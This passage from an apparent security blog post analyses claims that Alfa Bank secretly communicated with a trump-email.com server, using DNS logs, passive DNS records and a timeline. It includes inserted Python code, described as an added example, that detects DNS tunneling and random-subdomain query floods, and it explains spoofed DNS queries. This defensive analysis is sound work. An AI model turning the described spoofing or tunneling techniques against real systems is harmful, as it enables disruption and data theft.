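    return {src: tunneling_score(s) for src, s in summarise(log_text).items()}


if __name__ == "__main__":
    for src, s in summarise(LOG_LINES).items():
        print(src, tunneling_score(s), s)
```

<div>The repeating source trips none of the four indicators once its suffix-appended retry is collapsed, while the synthetic client trips all four; note that its "A" query is still flagged, because the uplink data sits in the query name regardless of the type requested.</div>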
<hr />
<h3 style="text-align: left;">
<i style="color: #ffd966;"><span style="color: #9fc5e8;">September 21, 2016 - October 5, 2016 As requests for comments were sent to Alfa Bank</span></i></h3>
<span style="color: #f1c232;"><span style="color: #f1c232; font-weight: bold;"><span style="color: #9fc5e8; font-family: "trebuchet ms" , sans-serif;"><b>Claim 11:</b></span></span></span><span style="font-family: "georgia" , "times new roman" , serif;"><i>"</i></span><span style="font-family: "georgia" , "times new roman" , serif;"><i>When a reporter called Alfa Bank for comment on September 21, the zone for mail1.trump-email.com was removed from ns1 and ns3.cdcservices.com causing RCODE=2 (Server Failure), and ns2 returned empty </i></span><span style="font-family: "georgia" , "times new roman" , serif;"><i>referrals</i></span><i style="color: #281b21; font-family: georgia, "times new roman", serif;">"</i><i><span style="font-family: "georgia" , "times new roman" , serif;">(src. <a href="https://gdd53.wordpress.com/">GDD</a>)</span></i><span style="font-family: "georgia" , "times new roman" , serif;"><i><br /> </i></span><span style="font-family: "georgia" , "times new roman" , serif;"><i> "One of the intriguing facts in my original piece was that the Trump server was shut down on Sept. 23, two days after the New York Times made inquiries to Alfa Bank (and a week before the Times reached out to Trump)." (src. <a href="http://www.slate.com/articles/news_and_politics/politics/2016/11/the_trump_server_evaluating_new_evidence_and_countertheories.html">Slate</a>)</i></span><br />
<span style="font-family: "georgia" , "times new roman" , serif;"><i><br /></i></span>
<span style="font-family: "georgia" , "times new roman" , serif;"><i>Trump, CenDyn or some other party associated with the domain sought to erase the mail1.Trump-Emal.com host by deleting forward resolution zones. So the domain name was removed from the normal way one would look up a domain. However, the reverse delegation still exists as of 2 November 2016." (src. <a href="http://ljean.com/NetworkRecords/intranet/">LJean.com</a>)</i></span></div>
<blockquote class="tr_bq">
<b style="color: #9fc5e8; font-family: "trebuchet ms", sans-serif;">Response 11:</b></blockquote>
<blockquote class="tr_bq" style="text-align: left;">
The machine at 66.216.133.29 in the Listrak data center is still up, so the server itself was not shut down; what changed was its DNS.<br />
Passive DNS shows the "A" record MAIL1.TRUMP-EMAIL.COM was last seen pointing to 66.216.133.29 on 2016-09-13. Since the Trump Organization stopped using Cendyn in March 2016, a cleanup of the DNS records had to happen eventually. We do not know whether Cendyn was contacted about the matter on or before September 22, 2016; if it was, removing the records would be a normal knee-jerk reaction to the inquiry.<br />
The records were removed only from the Ft. Lauderdale servers (NS1 and NS3) and not from NS2 in Boca Raton (different admins?). As many noted, the PTR record for 66.216.133.29 was also left behind and still points to mail1.trump-email.com, even though the "A" record was finally moved to the GoDaddy domain-parking address 184.168.221.46 on March 8, 2017 (after the domain was transferred back to the Trump Organization). </blockquote>
<div style="text-align: left;">
</div>
<hr />
<br />
<span style="color: #f1c232;"><span style="color: #f1c232; font-weight: bold;"><span style="color: #9fc5e8; font-family: "trebuchet ms" , sans-serif;"><b>Claim 12</b></span><span style="color: #9fc5e8; font-family: "trebuchet ms" , sans-serif;">:</span> </span></span><span style="font-family: "georgia" , "times new roman" , serif;"><i>"</i></span><i><span style="font-family: "georgia" , "times new roman" , serif;"><span style="font-family: "georgia" , "times new roman" , serif;">Alfa Bank knew that Trump renamed his host through ongoing email delivery and HELO/EHLO resolutions, or another channel. Trump and Alfa Bank have since coordinated their move to an office communications channel." (src. </span><span style="font-family: "georgia" , "times new roman" , serif;"> </span><a href="https://gdd53.wordpress.com/" style="font-family: georgia, "times new roman", serif;">GDD</a><span style="font-family: "georgia" , "times new roman" , serif;">)</span></span></i><br />
<blockquote class="tr_bq">
<b style="color: #9fc5e8; font-family: "trebuchet ms", sans-serif;">Response 12:</b></blockquote>
<blockquote class="tr_bq">
Not sure what the author means by "an office communications channel". The requests for comment were sent to Alfa Bank on September 21, 2016. On September 27, 2016 the Alfa Bank DNS server looked up TRUMP1.CONTACT-CLIENT.COM. Given that they were investigating the claims, it is not unexpected that their security people eventually found and queried the other name associated with the IP.</blockquote>
<hr />
<span style="color: #f1c232;"><span style="color: #f1c232; font-weight: bold;"><span style="color: #9fc5e8; font-family: "trebuchet ms" , sans-serif;"><b>Claim 13</b></span><span style="color: #9fc5e8; font-family: "trebuchet ms" , sans-serif;">:</span> </span></span><span style="font-family: "georgia" , "times new roman" , serif;"><i>"</i></span><i><span style="font-family: "georgia" , "times new roman" , serif;"><span style="font-family: "georgia" , "times new roman" , serif;">The hostname trump1.contact-client.com appeared in the first passive DNS</span></span></i><br />
<i><span style="font-family: "georgia" , "times new roman" , serif;"><span style="font-family: "georgia" , "times new roman" , serif;"><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0v-BQwrowRccxOoBD2z7wxkS_xT_TOGCSMVkresjMXeYZsKFHetccXHh9e8Fiq1beAqBapgapaB02cDKdKctNY5lGMXtf34CTfNFCHZC32CTE8OiIeMHvGXbxaBGNfPbQmkAA5LoV0iMj/s1600/screenshot-1794.png" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="146" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0v-BQwrowRccxOoBD2z7wxkS_xT_TOGCSMVkresjMXeYZsKFHetccXHh9e8Fiq1beAqBapgapaB02cDKdKctNY5lGMXtf34CTfNFCHZC32CTE8OiIeMHvGXbxaBGNfPbQmkAA5LoV0iMj/s200/screenshot-1794.png" width="200" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Over 500 subdomains. <br />
via PassiveTotal pDNS</td></tr>
</tbody></table>
database three days later, and still has not appeared in some passive collections." (src. </span><span style="font-family: "georgia" , "times new roman" , serif;"> </span><a href="https://gdd53.wordpress.com/" style="font-family: georgia, "times new roman", serif;">GDD</a><span style="font-family: "georgia" , "times new roman" , serif;">)</span></span></i><br />
<i><span style="font-family: "georgia" , "times new roman" , serif;"><br /></span></i>
<br />
<blockquote class="tr_bq">
<b style="color: #9fc5e8; font-family: "trebuchet ms", sans-serif;">Response 13:</b></blockquote>
<blockquote class="tr_bq">
Passive DNS collections are passive: they record only the resolutions that pass their sensors, so they see a lot but not every successful resolution on the Internet. (see more at <a href="https://help.passivetotal.org/passive_dns.html">PassiveTotal FAQ</a> or <a href="https://www.farsightsecurity.com/technical/passive-dns/passive-dns-faq/#q11">Farsight pDNS FAQ</a> )</blockquote>
<hr />
<h3 style="text-align: left;">
<i><span style="color: #9fc5e8;">October 5, 2016 - March 8, 2017 Post-Disclosure</span></i></h3>
<span style="color: #f1c232;"><span style="color: #f1c232; font-weight: bold;"><span style="color: #9fc5e8; font-family: "trebuchet ms" , sans-serif;"><b>Claim 14</b></span><span style="color: #9fc5e8; font-family: "trebuchet ms" , sans-serif;">:</span> </span></span><span style="color: #f1c232;"><span style="color: #f1c232; font-weight: bold;"> </span></span><br />
<span style="font-family: "georgia" , "times new roman" , serif;"><i>In March 2016, Cendyn said it "transferred back to" Trump's company the mail1.trump-email.com domain. (Src. <a href="http://www.cnn.com/2017/03/09/politics/fbi-investigation-continues-into-odd-computer-link-between-russian-bank-and-trump-organization/index.html">CNN</a>)</i></span><br />
<div>
<blockquote class="tr_bq">
<b style="color: #9fc5e8; font-family: "trebuchet ms", sans-serif;">Response 14:</b></blockquote>
<blockquote class="tr_bq">
Yes, they did transfer the domain control on 2017-03-08. Since then, MAIL1.TRUMP-EMAIL.COM and all subdomains resolve to 184.168.221.46 - GoDaddy Parking (IP address for domains without associated hosting servers) </blockquote>
<div>
<hr />
<span style="color: #9fc5e8; font-family: "trebuchet ms" , sans-serif;"><span style="color: #f1c232; font-family: "times";"><span style="color: #f1c232; font-weight: bold;"><span style="color: #9fc5e8; font-family: "trebuchet ms" , sans-serif;"><b>Claim 15</b></span><span style="color: #9fc5e8; font-family: "trebuchet ms" , sans-serif;">:</span> </span></span></span><br />
<span style="font-family: "georgia" , "times new roman" , serif;"><i>Alfa Bank claims that the recent attacks in February and March 2017 are intended to make it look they continue the secret communications with the Trump server.</i></span><br />
<blockquote class="tr_bq">
<b style="color: #9fc5e8; font-family: "trebuchet ms", sans-serif;">Response 15:</b></blockquote>
<span style="color: #9fc5e8; font-family: "trebuchet ms" , sans-serif;"></span><br />
<blockquote class="tr_bq" style="text-align: left;">
<span style="color: #d5a6bd; font-family: "georgia" , "times new roman" , serif;"><i><b>2017-02-17 </b></i></span><span style="font-family: "georgia" , "times new roman" , serif;"><i>According to the Alfa Bank press release on 2017-03-17, on 2017-02-17 computers in USA sent requests to "Trump Organization server" and made it look like it came "from various variants of MOSCow.ALFAintRa.nET", thus the "Trump's server's" replies were sent to Alfa bank.(src. </i><a href="https://alfabank.ru/press/news/2017/3/17/38162.html" style="font-style: italic;">Alfa Bank</a><i> and </i><a href="http://circa.com/politics/alfa-bank-in-russia-said-donald-trump-computer-connections-may-have-been-hacker-hoax" style="font-style: italic;">Circa</a><i>).</i></span></blockquote>
<blockquote class="tr_bq">
Press releases often go through several layers of editing, which can affect the technical accuracy of the text. For example, here we can assume that by "the Trump Organization server" they mean Cendyn's DNS server for MAIL1.TRUMP-EMAIL.COM, and that this server received DNS queries for MAIL1.TRUMP-EMAIL.COM from source IP addresses spoofed to look like Alfa Bank's. DNS servers log the IP address of a requestor, not its domain name, so it is not entirely clear where they saw <span style="font-family: "georgia" , "times new roman" , serif;"><i>MOSCow.ALFAintRa.nET. </i>I am not questioning the fact of the attack, but it is hard to say what happened without actual logs or more technical data.</span></blockquote>
<blockquote class="tr_bq">
<span style="color: #d5a6bd; font-family: "georgia" , "times new roman" , serif;"><i>2017-03-11 and 2017-03-13 </i></span><i><span style="font-family: "georgia" , "times new roman" , serif;">According to the Alfa Bank press release on 2017-03-17, on 2017-03-11 and 2017-03-13 their systems received 1340 DNS replies to the queries they did not send for mail.trump-email.com.moscow.alfaintra.net.(src. <a href="https://alfabank.ru/press/news/2017/3/17/38162.html">Alfa Bank</a> and <a href="http://circa.com/politics/alfa-bank-in-russia-said-donald-trump-computer-connections-may-have-been-hacker-hoax">Circa</a>)</span></i></blockquote>
<blockquote class="tr_bq">
Again, it looks like the press release is lacking technical accuracy, which is ok.<br />
In general, sending DNS requests from spoofed IP addresses (crafted packets) is very easy. Attackers often query nonexistent subdomains so that their recursive DNS server cannot answer from cache and has to forward every query to the authoritative DNS server for that domain, which overloads it. DDoS does not seem to be the goal here; this looks more like malicious experimenting. </blockquote>
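The cache-defeating "random subdomain" pattern described in Response 15, and the "(pseudo?)random subdomain" queries noted in the timeline further down, can be picked out of an authoritative server's query log by looking at what each source asks for. The following is an added example, not code from this post, from Cendyn or from the leaked cdcservices.com logs: it assumes a BIND-style query log line layout, uses constructed sample lines with RFC 5737 test addresses, an assumed set of names the zone serves, and an admittedly heuristic test for random-looking labels.

```python
"""Classify per-source query behaviour in an authoritative DNS query log.

Added example, not code from the DeepEnd Research post or the leaked
cdcservices.com logs. Assumptions: a BIND-style line layout
('<date> <time> client <ip>#<port>: query: <name> IN <type>'), constructed
sample lines with RFC 5737 test addresses, and a heuristic random-label test.
"""
import re
from collections import defaultdict

# Assumed BIND-style query log line; adjust the regex for other servers.
LOG_RE = re.compile(
    r"^(?P<ts>\S+ \S+) client (?P<ip>[\d.]+)#\d+: query: "
    r"(?P<name>\S+) IN (?P<qtype>[A-Z]+)"
)

ZONE = "trump-email.com"

# Names the zone is assumed to serve (constructed; the real zone is not public).
KNOWN_NAMES = {"trump-email.com", "mail.trump-email.com", "mail1.trump-email.com"}

# Constructed sample log: repeat lookups of real names from two sources, then a
# burst of never-repeated random labels from a third source.
SAMPLE_LOG = """\
2016-09-23 08:30:01 client 192.0.2.15#53414: query: mail1.trump-email.com IN A
2016-09-23 08:30:02 client 192.0.2.15#53415: query: mail1.trump-email.com IN A
2016-09-23 08:31:17 client 192.0.2.137#40210: query: mail.trump-email.com IN A
2016-09-23 08:32:00 client 198.51.100.7#1024: query: x7q2kd9vbz.trump-email.com IN A
2016-09-23 08:32:00 client 198.51.100.7#1025: query: 3nfh8t1wq0.trump-email.com IN CNAME
2016-09-23 08:32:01 client 198.51.100.7#1026: query: p9z0r4m2lk.trump-email.com IN A
2016-09-23 08:32:01 client 198.51.100.7#1027: query: qv61b8tn5c.trump-email.com IN A
2016-09-23 08:32:02 client 198.51.100.7#1028: query: h2d7w9xk3m.trump-email.com IN A
this line is not a query record and is skipped
"""


def parse_log(text):
    """Yield (source_ip, qname, qtype) for each well-formed line; skip the rest."""
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            yield m["ip"], m["name"].lower().rstrip("."), m["qtype"]


def looks_random(label):
    """Heuristic test for a machine-generated DNS label: at least 8 characters,
    mixed letters and digits, and almost no vowels (dictionary words have many)."""
    if len(label) < 8:
        return False
    has_digit = any(c.isdigit() for c in label)
    has_alpha = any(c.isalpha() for c in label)
    vowels = sum(c in "aeiou" for c in label)
    return has_digit and has_alpha and vowels <= len(label) // 4


def classify_sources(text, zone=ZONE, known=KNOWN_NAMES, min_queries=5, threshold=0.8):
    """Return {source_ip: verdict} over the queries that fall inside `zone`.

    A source is 'random-subdomain-flood' when at least `min_queries` of its
    queries hit the zone and a `threshold` share of them are for names the zone
    does not serve, each asked exactly once, with a random-looking leftmost
    label: nothing a resolver could have answered from cache. Everything else
    is 'normal'. The log holds source IPs only, so a spoofed source looks the
    same as a real one."""
    per_ip = defaultdict(list)
    for ip, name, _qtype in parse_log(text):
        if name == zone or name.endswith("." + zone):
            per_ip[ip].append(name)
    verdicts = {}
    for ip, names in per_ip.items():
        seen_once = {n for n in names if names.count(n) == 1}
        random_unknown = {n for n in seen_once
                          if n not in known and looks_random(n.split(".")[0])}
        flood = len(names) >= min_queries and len(random_unknown) / len(names) >= threshold
        verdicts[ip] = "random-subdomain-flood" if flood else "normal"
    return verdicts


if __name__ == "__main__":
    for ip, verdict in sorted(classify_sources(SAMPLE_LOG).items()):
        print(f"{ip:15} {verdict}")
```

Because the log carries only source IP addresses, a source spoofed in the query packets is indistinguishable here from a genuine one; the classifier characterises the traffic pattern, not who sent it, which is the same limitation the post points out for the press release.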
<div>
<hr />
<span style="color: #9fc5e8; font-family: "trebuchet ms" , sans-serif;"><b>Claim 16</b></span><span style="color: #9fc5e8; font-family: "trebuchet ms" , sans-serif; font-weight: bold;">:</span></div>
</div>
<span style="font-family: "georgia" , "times new roman" , serif;"><i>But experts claim it is &lt;unusual, odd, etc.&gt;</i></span><br />
<br />
<blockquote class="tr_bq">
<b style="color: #9fc5e8; font-family: "trebuchet ms", sans-serif;">Response 16: </b></blockquote>
<blockquote class="tr_bq">
In tech speak, epithets like "odd", "weird" and "not normal" do not really mean clandestine or paranormal. They are technical terms conveying that the available evidence is too limited to let one extrapolate the possible scenarios. I am not speaking for every comment out there, but I am suggesting not to jump to conclusions when a nerd calls something "odd". <br />
Robert Graham comments on the experts' claims too (src. <a href="http://blog.erratasec.com/2016/11/debunking-trumps-secret-server.html#.WMeGlxIrLKi">Errata Security</a>)</blockquote>
</div>
<div>
<h3 style="clear: both; color: black; text-align: left;">
</h3>
</div>
<h2 style="text-align: left;">
<span style="color: #f1c232;">Timeline of events 2007 - 2017</span></h2>
It is useful, I think, to establish a timeline of the events. The milestones shown in the image are listed with their references below.<br />
<div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDS1RlMAMJ2MoYFAPjqpZZk3MvdsDLZPT2F0d5ryW9lT-KUKu2Gjr0UbIAMzr9kTpeCRpkDjzkpU-QWy_iAP1OtxjxDv40p2a7cLXwmZpLPwscZRL7KVrmcBfIS20iMNkLLHvhyphenhyphenpgxj8_o/s1600/screenshot-1763.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><span style="font-family: inherit;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDS1RlMAMJ2MoYFAPjqpZZk3MvdsDLZPT2F0d5ryW9lT-KUKu2Gjr0UbIAMzr9kTpeCRpkDjzkpU-QWy_iAP1OtxjxDv40p2a7cLXwmZpLPwscZRL7KVrmcBfIS20iMNkLLHvhyphenhyphenpgxj8_o/s1600/screenshot-1763.png" /></span></a></td></tr>
<tr><td class="tr-caption" style="font-size: 12.8px;"><span style="font-family: inherit; font-size: small;">Timeline of events February 2016 - March 2017</span></td></tr>
</tbody></table>
</div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: inherit;"><br /></span></div>
<b><span style="font-family: inherit;">References for the timeline</span></b><br />
<ul style="text-align: left;">
<li><span style="font-family: inherit;">2007-06-21 <a href="http://www.prnewswire.com/news-releases/cendyn-is-tapped-for-interactive-marketing-services-by-the-trump-organization-58251682.html">Cendyn is chosen as a marketing vendor for Trump Hotels</a> (src. <a href="http://www.prnewswire.com/news-releases/cendyn-is-tapped-for-interactive-marketing-services-by-the-trump-organization-58251682.html">Prnewswire</a>)</span></li>
<li><span style="font-family: inherit;">2009-08-14 TRUMP-EMAIL.COM registered by sl.admin@cendyn.com (src. <a href="https://research.domaintools.com/research/whois-history/search/?q=trump-email.com">Domaintools.com</a>)</span></li>
<li><span style="font-family: inherit;">2010 Last time, according to Hope Hicks (White House) when MAIL1.TRUMP-EMAIL.COM on 66.216.133.29 was used by Trump (src. <a href="https://www.theguardian.com/us-news/2016/oct/31/trump-organization-server-russia-bank-slate-report">The Guardian</a>)</span></li>
<li><span style="font-family: inherit;">2011-03-07 Email header of a message sent on March 7, 2011 (Src. <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6xFZR0UxoxeRZOIA5yFOZwPwgXEODCpJ1nXZ2XS45ynR0Al5QJbumol5-hhoZi5zED5NCaQOHe0968Gsm4-I9XzcArT5lPAGb9-RPVA-1cFv-eWl2RRZeniMrjv1NAj2lv-EWq-7lrPig/s1600/header.png">DeepEnd Res</a>)</span></li>
<li><span style="font-family: inherit;">2016-March Last time the server was used to send emails, according to Cendyn (src. <a href="http://www.cnn.com/2017/03/09/politics/fbi-investigation-continues-into-odd-computer-link-between-russian-bank-and-trump-organization/index.html">CNN</a>)</span></li>
<li><span style="font-family: inherit;">2016-05-04 First time stamp in the <a href="http://ljean.com/NetworkRecords/ns2_cdcservices_com.log">leaked logs</a></span></li>
<li><span style="font-family: inherit;">2016-07 <a href="https://gdd53.wordpress.com/">Tea Leaves </a>researches logs and shares data with computer experts</span></li>
<li><span style="font-family: inherit;">2016-09-13 Last time MAIL1.TRUMP-EMAIL.COM A record was seen by pDNS on 66.216.133.29</span></li>
<li>2016-09-23 Last timestamp in the <a href="http://ljean.com/NetworkRecords/ns1_cdcservices_com.log" style="font-family: inherit;">leaked logs </a></li>
<li><span style="font-family: inherit;">2016-09-21 <a href="http://ljean.com/NetworkRecords/all.html">Alfa Bank were contacted for comments</a></span></li>
<li><span style="font-family: inherit;">2016-09-22 <a href="http://ljean.com/NetworkRecords/all.html">DNS Errors on trump-email.com</a></span></li>
<li><span style="font-family: inherit;">2016-09-23 <a href="http://ljean.com/NetworkRecords/all.html">DNS Errors on trump-email.com</a></span></li>
<li><span style="font-family: inherit;">2016-09-23 Alfa Bank 217.12.97.15 and 217.12.97.137 make DNS A record queries for MAIL.TRUMP-EMAIL.COM (mail without 1) that is on 198.91.42.236 (src. <a href="http://ljean.com/NetworkRecords/ns1_cdcservices_com.log">leaked logs</a>)</span></li>
<li><span style="font-family: inherit;">2016-09-23 Three CNAME and A queries for (pseudo?)random subdomain of trump-email.com get registered by pDNS</span></li>
<li><span style="font-family: inherit;">2016-09-27 <a href="https://gdd53.wordpress.com/">Alfa Bank 217.12.97.15 makes a DNS A record query for TRUMP1.CONTACT-CLIENT.COM</a></span></li>
<li><span style="font-family: inherit;">2016-09-30 TRUMP1.CONTACT-CLIENT.COM first seen by Farsight pDNS on 66.216.133.29</span></li>
<li><span style="font-family: inherit;">2016-10-03 TRUMP1.CONTACT-CLIENT.COM first seen by Virustotal pDNS on 66.216.133.29<br />2016-10-03 TRUMP1.CONTACT-CLIENT.COM first seen by PassiveTotal pDNS on </span>66.216.133.29</li>
<li><span style="font-family: inherit;">2016-10-05 GDD53 publishes the original article <a href="https://gdd53.wordpress.com/">Trump’s Russian Bank Account</a></span></li>
<li><span style="font-family: inherit;">2017-02-17 According to the Alfa Bank press release on 2017-03-17, computers in USA sent requests to "Trump Organization server" and made it look like it came "from MOSCow.ALFAintRa.nET", thus the "Trump's server's" replies were sent to Alfa bank.(src. <a href="https://alfabank.ru/press/news/2017/3/17/38162.html">Alfa Bank</a> and <a href="http://circa.com/politics/alfa-bank-in-russia-said-donald-trump-computer-connections-may-have-been-hacker-hoax">Circle</a>)</span></li>
<li><span style="font-family: inherit;">2017-03-08<a href="http://trump-email.com%20was%20transferred%20by%20cendyn/"> TRUMP-EMAIL.COM was transferred by Cendyn</a> to "Registrant Organization: Trump Orgainzation Registrant Street: 725 Fifth Avenue Registrant City: New York"</span></li>
<li><span style="font-family: inherit;">2017-03-04 - <i>29.133.216.66.in-addr.arpa.</i> PTR for MAIL1.TRUMP-EMAIL.COM last seen on 66.216.133.2 (via dig -x)</span></li>
<li><span style="font-family: inherit;">2017-03-11 and 2017-03-13 </span>According to the Alfa Bank press release on 2017-03-17, their systems received 1340 DNS replies to the queries they did not send for mail.trump-email.com.moscow.alfaintra.net.(src. <a href="https://alfabank.ru/press/news/2017/3/17/38162.html">Alfa Bank</a> and <a href="http://circa.com/politics/alfa-bank-in-russia-said-donald-trump-computer-connections-may-have-been-hacker-hoax">Circle</a>)</li>
</ul>
<div>
<br />
<h2 style="text-align: left;">
<b>Previous Reports and Research</b></h2>
<ul style="text-align: left;">
<li>2016-10-05 Tea Leaves GDD53 <a href="https://gdd53.wordpress.com/">Trump’s Russian Bank Account</a></li>
<li>2016-10 DNS logs Jean Camp <a href="http://ljean.com/NetworkData.php">Transparent Network data</a></li>
<li>2016-10-08 Krypt3ia <a href="https://krypt3ia.wordpress.com/2016/10/08/gdd53-a-russian-hosted-i2p-site-that-claims-trumps-email-system-had-ties-to-alfabank-russia/">GDD53: A Russian Hosted i2p Site That Claims Trump’s Email System Had Ties To Alfabank (Russia)</a></li>
<li>2016-10-31 Slate <a href="http://www.slate.com/articles/news_and_politics/cover_story/2016/10/was_a_server_registered_to_the_trump_organization_communicating_with_russia.html">Was a Trump Server Communicating With Russia?</a></li>
<li>2016-11-01 Krypt3ia <a href="https://krypt3ia.wordpress.com/2016/11/01/shits-gone-plaid-gdd53-and-slate/">Shits Gone Plaid: GDD53 and Slate</a></li>
<li>2016-11-01 <a href="http://blog.erratasec.com/2016/11/debunking-trumps-secret-server.html#.WMnhOxIrKso">Errata Security Debunking Trump's "secret server"</a></li>
<li>2016-11-03 Errata Security <a href="http://blog.erratasec.com/2016/11/in-which-i-have-to-debunk-second-time.html#.WMni6xIrKsq">In which I have to debunk a second time</a></li>
<li>2016-11-01 Washington Post <a href="https://www.washingtonpost.com/news/the-fix/wp/2016/11/01/that-secret-trump-russia-email-server-link-is-likely-neither-secret-nor-a-trump-russia-link/?utm_term=.05c093a62fa4">That secret Trump-Russia email server link is likely neither secret nor a Trump-Russia link</a></li>
<li>2016-11-01 <a href="https://theintercept.com/2016/11/01/heres-the-problem-with-the-story-connecting-russia-to-donald-trumps-email-server/">The Intercept Here is a problem with the story connecting Russia to Donald Trump's Email </a></li>
<li>2016-11-02 <a href="http://www.slate.com/articles/news_and_politics/politics/2016/11/the_trump_server_evaluating_new_evidence_and_countertheories.html">Slate. Trump’s Server, Revisited</a></li>
<li>2017-03-10 CNN <a href="http://www.cnn.com/2017/03/09/politics/fbi-investigation-continues-into-odd-computer-link-between-russian-bank-and-trump-organization/index.html">Sources: FBI investigation continues into 'odd' computer link between Russian bank and Trump Organization</a></li>
<li>2017-03 Snopes (Unproven) <a href="http://www.snopes.com/trump-server-tied-to-russian-bank/">Trump Organization Computer Server Tied to Russian Bank?</a></li>
<li>2017-03-17 <a href="https://alfabank.ru/press/news/2017/3/17/38162.html">Alfa Bank. Заявление для прессы</a></li>
<li>2017-03-17 Circa.<a href="http://circa.com/politics/alfa-bank-in-russia-said-donald-trump-computer-connections-may-have-been-hacker-hoax"> Russian bank tells DOJ mysterious Trump computer connections may have been hacker hoax</a></li>
</ul>
<br />
<br />
<br />
</div>
</div>
</div>
DNSDB rrset lookup for *.trump-email.com.: <a href="https://www.dnsdb.info/#Search_rrset_ANY_*.trump-email.com." target="_blank">https://www.dnsdb.info/#Search_rrset_ANY_*.trump-email.com.</a> (<a href="https://www.farsightsecurity.com/">courtesy of Farsight Security pDNS</a>)<br />
<br />
<table cellspacing="5" class="result" style="background-color: white; border-color: rgb(0, 136, 204); border-radius: 4px; border-style: solid; border-width: 2px; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; margin: 1em 2.5em; padding-left: 1em; padding-right: 1em;"><tbody>
<tr><td><span style="color: #20124d;">bailiwick</span></td><td colspan="2"><b><a href="https://www.dnsdb.info/#Search_rrset_ANY_*.com." id="bwick" style="text-decoration: none;"><span style="color: #20124d;">com.</span></a></b></td></tr>
<tr><td><span style="color: #20124d;">count</span></td><td colspan="2"><span style="color: #20124d;">2498</span></td></tr>
<tr><td><span style="color: #20124d;">first seen in zone file</span></td><td colspan="2"><span style="color: #20124d;">2010-04-24 16:12:21 -0000</span></td></tr>
<tr><td><span style="color: #20124d;">last seen in zone file</span></td><td colspan="2"><span style="color: #20124d;">2017-03-07 17:02:37 -0000</span></td></tr>
<tr id="color0" style="background-color: #aecbe6;"><td><tt><a href="https://www.dnsdb.info/#Search_rdata_name_ANY_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_NS_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">NS</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_ANY_ns1.cdcservices.com." style="text-decoration: none;"><span style="color: #20124d;">ns1.cdcservices.com.</span></a></tt></td></tr>
<tr id="color1" style="background-color: gainsboro;"><td><tt><a href="https://www.dnsdb.info/#Search_rdata_name_ANY_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_NS_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">NS</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_ANY_ns2.cdcservices.com." style="text-decoration: none;"><span style="color: #20124d;">ns2.cdcservices.com.</span></a></tt></td></tr>
<tr id="color0" style="background-color: #aecbe6;"><td><tt><a href="https://www.dnsdb.info/#Search_rdata_name_ANY_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_NS_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">NS</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_ANY_ns3.cdcservices.com." style="text-decoration: none;"><span style="color: #20124d;">ns3.cdcservices.com.</span></a></tt></td></tr>
<tr><td></td></tr>
<tr><td><span style="color: #20124d;">bailiwick</span></td><td colspan="2"><b><a href="https://www.dnsdb.info/#Search_rrset_ANY_*.com." id="bwick" style="text-decoration: none;"><span style="color: #20124d;">com.</span></a></b></td></tr>
<tr><td><span style="color: #20124d;">count</span></td><td colspan="2"><span style="color: #20124d;">9</span></td></tr>
<tr><td><span style="color: #20124d;">first seen in zone file</span></td><td colspan="2"><span style="color: #20124d;">2017-03-08 17:02:36 -0000</span></td></tr>
<tr><td><span style="color: #20124d;">last seen in zone file</span></td><td colspan="2"><span style="color: #20124d;">2017-03-16 16:02:32 -0000</span></td></tr>
<tr id="color1" style="background-color: gainsboro;"><td><tt><a href="https://www.dnsdb.info/#Search_rdata_name_ANY_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_NS_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">NS</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_ANY_ns33.domaincontrol.com." style="text-decoration: none;"><span style="color: #20124d;">ns33.domaincontrol.com.</span></a></tt></td></tr>
<tr id="color0" style="background-color: #aecbe6;"><td><tt><a href="https://www.dnsdb.info/#Search_rdata_name_ANY_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_NS_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">NS</span></a></tt></td><td><tt><span style="color: #20124d;">ns34.domaincontrol.com.</span></tt></td></tr>
<tr><td></td></tr>
<tr><td><span style="color: #20124d;">bailiwick</span></td><td colspan="2"><b><span style="color: #20124d;">trump-email.com.</span></b></td></tr>
<tr><td><span style="color: #20124d;">count</span></td><td colspan="2"><span style="color: #20124d;">69</span></td></tr>
<tr><td><span style="color: #20124d;">first seen</span></td><td colspan="2"><span style="color: #20124d;">2017-03-08 02:52:17 -0000</span></td></tr>
<tr><td><span style="color: #20124d;">last seen</span></td><td colspan="2"><span style="color: #20124d;">2017-03-17 21:39:58 -0000</span></td></tr>
